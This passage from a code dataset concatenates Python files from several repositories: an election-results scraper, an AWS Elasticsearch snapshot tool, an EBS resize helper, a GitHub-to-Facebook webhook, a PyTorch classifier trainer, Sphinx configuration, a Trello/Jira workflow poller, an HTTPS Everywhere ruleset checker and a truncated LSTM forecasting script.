parties = table.find_all("tr")[2:]
for party in parties:
party_name = party.td.findNext("td").text
# skip empty row
if party_name == "-":
continue
# get number of votes for party
muni[party_name] = norm_int(party.td.findNext("td").findNext("td").text)
def get_data(url):
municip_list = []
soup = get_soup(url)
tables = soup.find_all("table", {"class": "table"})
for table in tables:
# extract table rows and remove header
municip_rows = table.find_all("tr")[2:]
for row in municip_rows:
# skip empty rows
if row.find("td").text == "-":
continue
mun_tmp = {
"code": "",
"name": "",
"registered": 0,
"envelopes": 0,
"valid": 0,
}
municip_url = BASE_URL + row.find("a")["href"]
# get code & name
mun_tmp["code"] = row.find("a").text
mun_tmp["name"] = row.a.findNext("td").text
# get municipality info
get_municip_info(municip_url, mun_tmp)
municip_list.append(mun_tmp)
return municip_list
if __name__ == "__main__":
# foreign voting places and main page
BAD_URLS = [
"https://volby.cz/pls/ps2017nss/ps36?xjazyk=CZ",
"https://volby.cz/pls/ps2017nss/ps3?xjazyk=CZ",
]
BASE_URL = "https://volby.cz/pls/ps2017nss/"
URL, CSV_FILE = check_args(BAD_URLS, BASE_URL, sys.argv)
data = get_data(URL)
csv_writter.write_csv(CSV_FILE, data)
print(f"Scraping is done. Output is in {CSV_FILE}.csv")
``` |
{
"source": "jpdoria/aws-es-index-snapshot",
"score": 2
} |
#### File: aws-es-index-snapshot/aws_eis/aws_eis.py
```python
import pkg_resources
import sys
from aws_eis.lib import test_con, get_version, py_version
from aws_eis.lib import cleanup, create, register, restore, set_args
def main():
# Check Python version
py_version()
parser = set_args()
args = parser.parse_args()
# Print help if no arguments are received
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
# Commands and their functions
if args.command == 'create':
test_con(args.endpoint)
create(args)
elif args.command == 'restore':
test_con(args.endpoint)
restore(args)
elif args.command == 'cleanup':
test_con(args.endpoint)
cleanup(args)
elif args.command == 'register':
test_con(args.endpoint)
register(args)
elif args.command == 'status':
test_con(args.endpoint)
elif args.command == 'version':
print(pkg_resources.require('aws_eis')[0].version)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('\nGoodbye!')
sys.exit(1)
```
#### File: aws_eis/lib/restore.py
```python
import json
import sys
import requests
def restore(args):
endpoint = args.endpoint
snap_name = args.snapshot_name
print('Note: you cannot restore a snapshot of your indices to an ' +
'Elasticsearch cluster that already contains indices with ' +
'the same names. Currently, Amazon ES does not support ' +
'the Elasticsearch _close API, so you must use one of the ' +
'following alternatives:\n\n' +
'1. Delete the indices on the {}, '.format(endpoint) +
'then restore the snapshot\n' +
'2. Restore the snapshot to a different Amazon ES domain\n')
while True:
try:
choice = int(input('Choose an option: [1/2] '))
except KeyboardInterrupt:
print('\nGoodbye!')
sys.exit(1)
except ValueError as e:
print('Please choose between 1 and 2.')
else:
if choice == 1:
print('Deleting indices on {}...'.format(endpoint))
r = requests.delete('https://{}/_all'.format(endpoint))
ack = json.loads(r.text)['acknowledged']
if ack is True:
print('Indices have been removed!')
else:
print('Unable to remove indices!')
sys.exit(1)
snap_dir = '_snapshot/weblogs-index-backups/'
print('Restoring {}...'.format(snap_name))
r = requests.post(
'https://{0}/{1}/{2}/_restore'
.format(endpoint, snap_dir, snap_name)
)
if r.status_code == 200:
                    print('Success! Please allow time for complete ' +
                          'restoration of {}.'.format(snap_name))
sys.exit(0)
else:
print(r.text)
sys.exit(1)
elif choice == 2:
url = 'https://{}/_snapshot/weblogs-index-backups'.format(
endpoint)
r = requests.get(url)
bucket_name = json.loads(r.text)[
'weblogs-index-backups']['settings']['bucket']
print('\nSnapshotDirectory: weblogs-index-backups')
print('S3Bucket: {}\n'.format(bucket_name))
print('Please register the snapshot directory to ' +
'your new Amazon Elasticsearch Service domain ' +
'then execute \'restore\' again.')
sys.exit(1)
else:
print('Please choose between 1 and 2.')
``` |
{
"source": "jpdoria/ebs-expand",
"score": 3
} |
#### File: ebs_expand/lib/set_args.py
```python
import argparse
def set_args():
ap = argparse.ArgumentParser(
description='Automate root volume expanding on Linux EBS-backed ' +
'EC2 instance.'
)
ap.add_argument(
'-r',
'--region',
help='AWS region is a geographical area (e.g., ap-southeast-1)',
required=True
)
ap.add_argument(
'-i',
'--instance-id',
help='Instance ID (e.g., i-1234567)',
required=True
)
ap.add_argument(
'-s',
'--size',
help='Desired size for the new EBS volume in GiB (e.g., 10 GiB)',
required=True
)
ap.add_argument(
'-v',
'--version',
help='Display current version of ebs_expand',
action='version',
version='%(prog)s (v1.1)'
)
return ap
``` |
{
"source": "jpdoria/github-facebook",
"score": 3
} |
#### File: jpdoria/github-facebook/gh-fb.py
```python
import hashlib
import hmac
import os
import facebook
from flask import Flask, redirect, request
app = Flask(__name__)
def fb_post(author, repo_name, repo_url, commit_message, commit_id,
description):
"""
This function receives the params from the webhook() then invokes the
put_wall_post() to create a new post on the user's timeline on Facebook.
"""
fb = facebook.GraphAPI(access_token=os.environ['FB_USER_TOKEN'],
version='2.7')
picture = 'https://cdn.lazyadm.in/Octocat/Octocat.jpg'
attachment = {
'name': '[GitHub] {0}/{1}'.format(author, repo_name),
'link': repo_url,
'caption': 'GitHub',
'description': description,
'picture': picture
}
fb.put_wall_post(message='[{0}] {1} | {2} - {3}'.format(
commit_id, repo_name, commit_message, author), attachment=attachment)
@app.route('/webhook', methods=['POST'])
def webhook():
"""
Compute the hash using GH_WEBHOOK_SECRET and ensure
that the hash from GitHub matches.
Reference: https://developer.github.com/webhooks/securing/
"""
x_hub_signature = request.headers.get('X-Hub-Signature')
if x_hub_signature is None:
print('X-Hub-Signature not found')
return 'X-Hub-Signature not found', 404
else:
sha_name, signature = x_hub_signature.split('=')
mac = hmac.new(bytes(os.environ['GH_WEBHOOK_SECRET'], 'utf-8'),
msg=request.data, digestmod=hashlib.sha1)
if sha_name != 'sha1':
print('Incorrect hash signature')
return 'Incorrect hash signature', 403
if signature is None:
print('Signature not found')
return 'Signature not found', 404
if hmac.compare_digest(mac.hexdigest(), signature):
print('Hash OK')
else:
print('Forbidden')
return 'Forbidden', 403
"""
Basically, this retrieves information after pushing a code to GitHub.
Information like: author, repository name, repository URL, commit message,
and timestamp.
An example of webhook payload can be found here:
https://developer.github.com/v3/activity/events/types/#webhook-payload-example-19
"""
data = request.get_json()
author = data['head_commit']['author']['username']
repo_name = data['repository']['name']
repo_url = data['repository']['url']
commit_message = data['head_commit']['message']
commit_id = data['head_commit']['id'][:7]
description = data['repository']['description']
fb_post(author, repo_name, repo_url, commit_message, commit_id,
description)
print('Post OK')
return 'Post OK', 200
@app.route('/', methods=['GET'])
def main():
return redirect('http://www.lazyadm.in/', code=301)
if __name__ == '__main__':
app.run(debug=True, use_reloader=True)
``` |
{
"source": "jpdpeters/Submission-Udacity-Image-Classifier",
"score": 2
} |
#### File: jpdpeters/Submission-Udacity-Image-Classifier/train.py
```python
import argparse
import torch
from collections import OrderedDict
from os.path import isdir
from torch import nn
from torch import optim
from torchvision import datasets, transforms, models
def arg_parser():
parser = argparse.ArgumentParser(description="Neural Network Settings")
parser.add_argument('--arch',
type=str,
help='Choose architecture from torchvision.models as str')
parser.add_argument('--save_dir',
type=str,
help='Define save directory for checkpoints as str. \nIf not specified then model will be lost.')
parser.add_argument('--learning_rate',
type=float,
help='Define gradient descent learning rate as float')
parser.add_argument('--hidden_units',
type=int,
help='Hidden units for DNN classifier as int')
parser.add_argument('--epochs',
type=int,
help='Number of epochs for training as int')
parser.add_argument('--gpu',
action="store_true",
help='Use GPU + Cuda for calculations')
args = parser.parse_args()
return args
def train_transformer(train_dir):
train_transforms = transforms.Compose([transforms.RandomRotation(30),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
train_data = datasets.ImageFolder(train_dir, transform=train_transforms)
return train_data
def test_transformer(test_dir):
test_transforms = transforms.Compose([transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
test_data = datasets.ImageFolder(test_dir, transform=test_transforms)
return test_data
def data_loader(data, train=True):
if train:
loader = torch.utils.data.DataLoader(data, batch_size=50, shuffle=True)
else:
loader = torch.utils.data.DataLoader(data, batch_size=50)
return loader
def check_gpu(gpu_arg):
if not gpu_arg:
return torch.device("cpu")
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
if device == "cpu":
print("CUDA was not found on device, using CPU instead.")
return device
def primaryloader_model(architecture="resnet152"):
if type(architecture) == type(None):
model = models.resnet152(pretrained=True)
model.name = "resnet152"
print("Network architecture specified as resnet152.")
else:
        # exec() cannot bind a new local variable in Python 3, so look the model
        # constructor up on torchvision.models instead
        model = getattr(models, architecture)(pretrained=True)
        model.name = architecture
for param in model.parameters():
param.requires_grad = False
return model
def initial_classifier(model, hidden_units):
if type(hidden_units) == type(None):
        hidden_units = 4096  # hyperparameter default
        print("Number of Hidden Layers specified as 4096.")
input_features = model.classifier[0].in_features
classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(input_features, hidden_units, bias=True)),
('relu1', nn.ReLU()),
('dropout1', nn.Dropout(p=0.5)),
('fc2', nn.Linear(hidden_units, 102, bias=True)),
('output', nn.LogSoftmax(dim=1))
]))
return classifier
def validation(model, testloader, criterion, device):
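    # Accumulate the loss and top-1 accuracy of the model over every batch in
    # the given loader.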
test_loss = 0
accuracy = 0
for ii, (inputs, labels) in enumerate(testloader):
inputs, labels = inputs.to(device), labels.to(device)
output = model.forward(inputs)
test_loss += criterion(output, labels).item()
ps = torch.exp(output)
equality = (labels.data == ps.max(dim=1)[1])
accuracy += equality.type(torch.FloatTensor).mean()
return test_loss, accuracy
def network_trainer(Model, Trainloader, Validloader, Device,
                    Criterion, Optimizer, Epochs, Print_every, Steps):
    if type(Epochs) == type(None):
        Epochs = 4
        print("Number of Epochs specified as 4.")
    print("In training process\n")
    for e in range(Epochs):
        running_loss = 0
        Model.train()
        for ii, (inputs, labels) in enumerate(Trainloader):
            Steps += 1
            inputs, labels = inputs.to(Device), labels.to(Device)
            Optimizer.zero_grad()
            outputs = Model.forward(inputs)
            loss = Criterion(outputs, labels)
            loss.backward()
            Optimizer.step()
            running_loss += loss.item()
            if Steps % Print_every == 0:
                Model.eval()
                with torch.no_grad():
                    valid_loss, accuracy = validation(Model, Validloader, Criterion, Device)
                print("Epoch: {}/{} | ".format(e+1, Epochs),
                      "Training Loss: {:.4f} | ".format(running_loss/Print_every),
                      "Validation Loss: {:.4f} | ".format(valid_loss/len(Validloader)),
                      "Validation Accuracy: {:.4f}".format(accuracy/len(Validloader)))
                running_loss = 0
                Model.train()
    return Model
def validate_model(Model, Testloader, Device):
correct = 0
total = 0
with torch.no_grad():
Model.eval()
for data in Testloader:
images, labels = data
images, labels = images.to(Device), labels.to(Device)
outputs = Model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy achieved by the network on test images is: %d%%' % (100 * correct / total))
def initial_checkpoint(Model, Save_Dir, Train_data):
if type(Save_Dir) == type(None):
print("Model checkpoint directory not specified, model will not be saved.")
else:
if isdir(Save_Dir):
Model.class_to_idx = Train_data.class_to_idx
checkpoint = {'architecture': Model.name,
'classifier': Model.classifier,
'class_to_idx': Model.class_to_idx,
'state_dict': Model.state_dict()}
            torch.save(checkpoint, Save_Dir + '/my_checkpoint.pth')
else:
print("Sorry, directory could not be found, model won't be saved.")
def main():
args = arg_parser()
data_dir = 'flowers'
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
    # Augment the training data; validation and test data only get resized/cropped
    train_data = train_transformer(train_dir)
    valid_data = test_transformer(valid_dir)
    test_data = test_transformer(test_dir)
trainloader = data_loader(train_data)
validloader = data_loader(valid_data, train=False)
testloader = data_loader(test_data, train=False)
model = primaryloader_model(architecture=args.arch)
model.classifier = initial_classifier(model,
hidden_units=args.hidden_units)
device = check_gpu(gpu_arg=args.gpu);
model.to(device);
if type(args.learning_rate) == type(None):
learning_rate = 0.001
        print("Learning rate specified as 0.001")
else: learning_rate = args.learning_rate
criterion = nn.NLLLoss()
optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate)
print_every = 30
steps = 0
trained_model = network_trainer(model, trainloader, validloader,
device, criterion, optimizer, args.epochs,
print_every, steps)
print("\nTraining process is now complete!!")
validate_model(trained_model, testloader, device)
initial_checkpoint(trained_model, args.save_dir, train_data)
if __name__ == '__main__': main()
``` |
{
"source": "jpds/https-everywhere",
"score": 2
} |
#### File: https-everywhere/utils/alexa-ruleset-checker.py
```python
import sys
import csv
import xml.etree.ElementTree as etree
import subprocess
import random
import urllib.request
import urllib.error
import zipfile
import os
import time
# Variables and constants
sitesList = []
# Temporary file containing the `git diff` between master and stable
tmpRulesFileName = "/tmp/rulesDiff-" + format(random.randrange(1,65535)) # Feel free to enlarge if needed
# URL of the Alexa Top1M
alexaTop1MURL = "http://s3.amazonaws.com/alexa-static/top-1m.csv.zip"
# alexaTop1MURL = "http://127.0.0.1/top-1m.csv.zip"
# Temporary file name, to aboid conflicts
tmpAlexaFileName = "/tmp/alexa-top1M-" + format(random.randrange(1,65535)) + ".csv"
# Logfile. Records the same output as the script
logFileName = "/tmp/alexa-ruleset-log-" + format(random.randrange(1,65535)) + ".log"
# Filename of the CSV file contained in the Alexa zipfile
tmpAlexaZipFileContents = 'top-1m.csv'
# Absolute path of the git repo (the folder containing src/)
# Remember to change this accordingly to your system, if you ever move the script
#
# By default, it refers to the parent directory of the one containing the script
# because the script was put in utils/
#
# __NEEDS A TRAILING SLASH__
#
# gitRepositoryPath = os.path.abspath(os.path.join(os.curdir, os.pardir))
gitRepositoryPath = os.path.abspath(os.path.join(os.curdir, os.pardir)) + "/"
# Maximum number of websites to use in the Alexa Top 1M (i.e. it's no longer 1M but maxSitesNumber)
# Set to -1 for 'unlimited'
maxSitesNumber = 1000
# Functions
def ruleLookup(target):
try: # list.index(value) throus an exception for a "not found", so if it throws it, it's not found
sitesList.index(target)
return 1
except:
return 0
# Fetch the Alexa Top 1M - http://stackoverflow.com/questions/1517616/stream-large-binary-files-with-urllib2-to-file
try:
print("Retrieving Alexa Top1M from", alexaTop1MURL)
tmpAlexaZipFileName, headers = urllib.request.urlretrieve(alexaTop1MURL)
print("File downloaded and stored in %s" % tmpAlexaZipFileName)
except urllib.error.URLError as e:
print("Failed to download Alexa Top 1M")
sys.exit('Error message: %s' % e)
# Now unzip it
try:
# Extract in /tmp/
print("Start extracting %s" % tmpAlexaZipFileName)
tmpAlexaZipFile = zipfile.ZipFile(tmpAlexaZipFileName,'r')
tmpAlexaZipFile.extractall('/tmp/')
except zipfile.BadZipfile:
sys.exit("The zip file %s is corrupted.",tmpAlexaZipFileName)
try:
# Rename the file to match the file with the random in it
os.rename('/tmp/' + tmpAlexaZipFileContents,tmpAlexaFileName)
print("Alexa Top1M retrieved and stored in %s" % tmpAlexaFileName)
except OSError as e:
print("Failed to rename /tmp/top-1M.csv to %s." % (tmpAlexaFileName))
sys.exit('Error message: %s' % (e))
# Handles reading the Alexa Top 1M and pushing all sites in a list
sitesReader = csv.reader(open(tmpAlexaFileName), delimiter=',', quotechar='"')
for row in sitesReader:
try:
        # Since some Alexa sites are not FQDNs, split where there's a "/" and keep only the first part
        sitesList.append(row[1].split("/",1)[0])
# print("Line %s: %s" % (sitesReader.line_num, sitesList[len(sitesList) - 1])) # Outputs the current line
if sitesReader.line_num == maxSitesNumber:
break
except csv.Error as e:
sys.exit('file %s, line %d: %s' % (tmpAlexaFileName, sitesReader.line_num, e))
# `git diff` the master revision against stable, rules folder only
try:
print("Create git diff between master and stable in %s" % tmpRulesFileName)
tmpRulesFile = open(tmpRulesFileName,"w")
#subprocess.call(['git', 'diff', '--name-status', 'master..remotes/origin/stable', '../src/chrome/content/rules'], stdout=tmpRulesFile)
subprocess.call(['git', 'diff', '--name-status', 'remotes/origin/stable..master', '../src/chrome/content/rules'], stdout=tmpRulesFile)
tmpRulesFile.close()
except OSError as e:
sys.exit('An OSError exception was raised: %s' % (e))
rulesList = open(tmpRulesFileName, 'r')
logFile = open(logFileName,'w')
logFile.write("Log file generated on %s.\nPaths are relative to the root directory of the git repo.\n\n" % time.strftime("%Y-%m-%d %H:%M:%S"))
# Let's keep track of how many rules were added and how many were modified
# Must be declared here or won't be available at the end of the loop
countAddedRules = 0
countEditedRules = 0
# Start parsing the list
for line in rulesList:
try:
# Split into "file mode in commit + file path"
ruleFile = line.split()
found = 0
# If file mode is "A" (add) or "M" (edited)
if ruleFile[0] == "A" or ruleFile[0] == "M": # If file was added or edited between stable and master, parse
ruleFileObject= open(gitRepositoryPath + ruleFile[1])
ruleText = etree.parse(ruleFileObject) # ADJUST FILE PATH (here is '../') IF YOU MOVE THE SCRIPT - XXX: Obsolete warning?
for target in ruleText.findall('target'):
FQDN = target.get('host') # URL of the website
if ruleLookup(FQDN) == 1: # Look it up in the sitesList
# Message different according to file mode
if ruleFile[0] == "A": # New
found = "NEW"
countAddedRules = countAddedRules + 1
break
elif ruleFile[0] == "M": # Edited
found = "EDITED"
countEditedRules = countEditedRules + 1
break
# If found, print it TABULATED
if found != 0:
print("%s:\t%s" % (found, ruleFile[1]))
            logFile.write("%s:\t%s\n" % (found, ruleFile[1]))
# else ignore
# There are some problems with file name encoding. So, for now, just print an error and pass
except FileNotFoundError as e: # Won't happen before line.split() is invoked
print("File not found:", ruleFile[1])
# logFile.write ("File not found: %s\n" % ruleFile[1])
logFile.write("%s\n" % e)
pass
except IOError as ioe: #Treated same as FileNotFoundError
print("File not found:", ruleFile[1])
# logFile.write ("File not found: %s\n" % ruleFile[1])
        logFile.write("%s\n" % ioe)
pass
# Print our simple statistics
print("\n\nStatistics:\nParsed rules: %s\nNewly added rules: %s\nEdited rules: %d" % (maxSitesNumber, countAddedRules, countEditedRules))
logFile.write("\n\nStatistics:\nParsed rules: %s\nNewly added rules: %s\nEdited rules: %d" % (maxSitesNumber, countAddedRules, countEditedRules))
print("\n\nLog file can be found at %s" % logFileName)
# Close the rules file
rulesList.close()
# And the log file
logFile.close()
``` |
{
"source": "JPDSousa/jotfiles",
"score": 2
} |
#### File: jotfiles/docs/conf.py
```python
import datetime
import os
import sys
sys.path.insert(0, os.path.abspath("."))
sys.path.insert(0, os.path.abspath("../"))
from jotfiles import __meta__ as meta # noqa: E402 isort:skip
# -- Project information -----------------------------------------------------
now = datetime.datetime.now()
project = meta.name
project_path = meta.path
author = meta.author
copyright = "{}, {}".format(now.year, author)
# The full version, including alpha/beta/rc tags
release = meta.version
# The short X.Y version
version = ".".join(release.split(".")[0:2])
# -- Automatically generate API documentation --------------------------------
def run_apidoc(_):
"""
Call apidoc, with customised set up.
"""
ignore_paths = [
os.path.join("..", project_path, "tests"),
]
argv = [
"--force", # Overwrite output files
"--follow-links", # Follow symbolic links
"--separate", # Put each module file in its own page
"--module-first", # Put module documentation before submodule
"-o",
"source/packages", # Output path
os.path.join("..", project_path),
] + ignore_paths
try:
# Sphinx 1.7+
from sphinx.ext import apidoc
apidoc.main(argv)
except ImportError:
# Sphinx 1.6 (and earlier)
from sphinx import apidoc
argv.insert(0, apidoc.__file__)
apidoc.main(argv)
def retitle_modules(_):
"""
Overwrite the title of the modules.rst file.
"""
pth = "source/packages/modules.rst"
    with open(pth) as modules_file:
        lines = modules_file.read().splitlines()
    # Overwrite the junk in the first two lines with a better title
    lines[0] = "API Reference"
    lines[1] = "============="
    with open(pth, "w") as modules_file:
        modules_file.write("\n".join(lines))
def setup(app):
"""
Set up our apidoc commands to run whenever sphinx is built.
"""
app.connect("builder-inited", run_apidoc)
app.connect("builder-inited", retitle_modules)
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.intersphinx",
"sphinx.ext.todo",
"sphinx.ext.coverage",
"sphinx.ext.mathjax",
"sphinx.ext.ifconfig",
"sphinx.ext.viewcode",
"sphinx.ext.napoleon",
]
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = False
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = [".rst", ".md"]
# The master toctree document.
master_doc = "index"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = project + "doc"
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, project + ".tex", project + " Documentation", meta.author, "manual"),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, project, project + " Documentation", [author], 1)]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
project,
project + " Documentation",
author,
project,
meta.description,
"Miscellaneous",
),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ["search.html"]
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("https://docs.python.org/", None),
"NumPy": ("https://docs.scipy.org/doc/numpy/", None),
"SciPy": ("https://docs.scipy.org/doc/scipy/reference", None),
"matplotlib": ("https://matplotlib.org", None),
"sklearn": ("https://scikit-learn.org/stable", None),
"Pillow": ("https://pillow.readthedocs.io/en/stable/", None),
"skimage": ("https://github.com/scikit-image/docs/raw/gh-pages/dev", None),
}
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
```
#### File: jotfiles/jotfiles/container.py
```python
from dependency_injector import containers, providers
from jotfiles.components import PersonalBoard
from jotfiles.comunication import Chat, ScheduledMessagesPool
from jotfiles.google import GChat
from jotfiles.jira_m import Config as JIRAConfig
from jotfiles.jira_m import JiraScrumBoard
from jotfiles.jira_m import load_from_file as load_jira_from_file
from jotfiles.scrum import ScrumBoard
from jotfiles.trello_m import TrelloPersonalBoard, TrelloScheduledMessagesPool
from jotfiles.trello_m import load_from_file as load_trello_from_file
from jotfiles.workflow_hooks import LocalWorkflow
def load_personal_space(config, trello_client, trello_config) -> PersonalBoard:
personal_board = config["personal_board"]
if personal_board == "trello":
return TrelloPersonalBoard(trello_client(), trello_config.board_id)
else:
raise ValueError(f"Unknown personal space type {personal_board}")
def load_scrum_board(config, jira_config) -> ScrumBoard:
scrum_board = config["scrum_board"]
if scrum_board == "jira":
return JiraScrumBoard(jira_config)
else:
raise ValueError(f"Unknown scrum board type {scrum_board}")
def load_smpool(config, trello_client) -> ScheduledMessagesPool:
smpool = config["smpool"]
if smpool == "trello":
return TrelloScheduledMessagesPool(trello_client())
else:
raise ValueError(f"Unknown scheduled messages pool type {smpool}")
def load_chat(config) -> Chat:
chat = config["chat"]
if chat == "gchat":
return GChat({})
else:
raise ValueError(f"Unknown chat type {chat}")
class Container(containers.DeclarativeContainer):
config = providers.Configuration()
trello_config = providers.Singleton(
load_trello_from_file, config.trello_credentials
)
trello_client = providers.Singleton(trello_config.provided.create_client)
personal_board = providers.Singleton(
load_personal_space, config, trello_client, trello_config
)
jira_config: JIRAConfig = providers.Singleton(
load_jira_from_file, config.jira_credentials
)
scrum_board = providers.Singleton(load_scrum_board, config, jira_config)
smpool = providers.Singleton(load_smpool, config, trello_client)
chat = providers.Singleton(load_chat, config)
workflow = providers.Singleton(
LocalWorkflow, scrum_board, personal_board, smpool, chat
)
```
#### File: jotfiles/jotfiles/workflow_poller.py
```python
import logging
import time
from pathlib import Path
import schedule
from pydantic import BaseSettings
from jotfiles.container import Container
logger = logging.getLogger(__name__)
class Config(BaseSettings):
personal_board: str = "trello"
scrum_board: str = "jira"
chat: str = "gchat"
smpool: str = "trello"
workflow_mode: str = "local"
base_path: Path = Path()
trello_credentials: Path = base_path / "credentials_trello.json"
jira_credentials: Path = base_path / "credentials_jira.json"
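
# Note (added): since Config extends pydantic's BaseSettings, every field above can be
# overridden through an environment variable of the same name, e.g. SCRUM_BOARD=jira.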
def bootstrap_poller():
container = Container()
container.config.from_pydantic(Config())
workflow = container.workflow()
personal_board = container.personal_board()
logger.info("Scheduling actions")
# this should be dynamic / decoupled
schedule.every().hour.do(workflow.update_sprint_issues)
schedule.every().hour.do(personal_board.update_done)
logger.info("All actions scheduled")
while True:
schedule.run_pending()
time.sleep(1)
if __name__ == "__main__":
bootstrap_poller()
``` |
{
"source": "JPDucky/Time-Series-Methods-Research",
"score": 2
} |
#### File: JPDucky/Time-Series-Methods-Research/lstm injprod.py
```python
from math import sqrt
from numpy import concatenate
from matplotlib import pyplot
from pandas import read_csv
from pandas import DataFrame
from pandas import concat
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import mean_squared_error
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
# convert series to supervised learning
def series_to_supervised(data, n_in=1, n_out=1, dropnan=True):
n_vars = 1 if type(data) is list else data.shape[1]
df = DataFrame(data)
cols, names = list(), list()
# input sequence (t-n, ... t-1)
for i in range(n_in, 0, -1):
cols.append(df.shift(i))
names += [('var%d(t-%d)' % (j+1, i)) for j in range(n_vars)]
# forecast sequence (t, t+1, ... t+n)
for i in range(0, n_out):
cols.append(df.shift(-i))
if i == 0:
names += [('var%d(t)' % (j+1)) for j in range(n_vars)]
else:
names += [('var%d(t+%d)' % (j+1, i)) for j in range(n_vars)]
# put it all together
agg = concat(cols, axis=1)
agg.columns = names
# drop rows with NaN values
if dropnan:
agg.dropna(inplace=True)
return agg
# load dataset
dataset = read_csv('C:\\Users\jpdub\injprod1.csv', header=0, index_col=0)
values = dataset.values
# integer encode direction
encoder = LabelEncoder()
values[:,4] = encoder.fit_transform(values[:,4])
# ensure all data is float
values = values.astype('float32')
# normalize features
scaler = MinMaxScaler(feature_range=(0, 1))
scaled = scaler.fit_transform(values)
# frame as supervised learning
reframed = series_to_supervised(scaled, 1, 1)
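# Illustrative note (added), assuming the CSV supplies 8 data columns as the column drop
# below implies: reframed then holds 16 columns, var1(t-1)..var8(t-1) followed by
# var1(t)..var8(t), with the first row dropped because the one-step shift leaves NaNs.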
# drop columns we don't want to predict
reframed.drop(reframed.columns[[9,10,11,12,13,14,15]], axis=1, inplace=True)
print(reframed.head())
# split into train and test sets
values = reframed.values
n_train_hours = 365 * 24
train = values[:n_train_hours, :]
test = values[n_train_hours:, :]
# split into input and outputs
train_X, train_y = train[:, :-1], train[:, -1]
test_X, test_y = test[:, :-1], test[:, -1]
# reshape input to be 3D [samples, timesteps, features]
train_X = train_X.reshape((train_X.shape[0], 1, train_X.shape[1]))
test_X = test_X.reshape((test_X.shape[0], 1, test_X.shape[1]))
print(train_X.shape, train_y.shape, test_X.shape, test_y.shape)
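# Shape note (added): with a single lag step the 3D input is (samples, 1, features),
# i.e. one timestep of 8 features per sample for this dataset.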
# design network
model = Sequential()
model.add(LSTM(50, input_shape=(train_X.shape[1], train_X.shape[2])))
model.add(Dense(1))
model.compile(loss='mae', optimizer='adam')
# fit network
history = model.fit(train_X, train_y, epochs=50, batch_size=72, validation_data=(test_X, test_y), verbose=2, shuffle=False)
# plot history
pyplot.plot(history.history['loss'], label='train')
pyplot.plot(history.history['val_loss'], label='test')
pyplot.legend()
pyplot.show()
# make a prediction
yhat = model.predict(test_X)
test_X = test_X.reshape((test_X.shape[0], test_X.shape[2]))
# invert scaling for forecast
inv_yhat = concatenate((yhat, test_X[:, 1:]), axis=1)
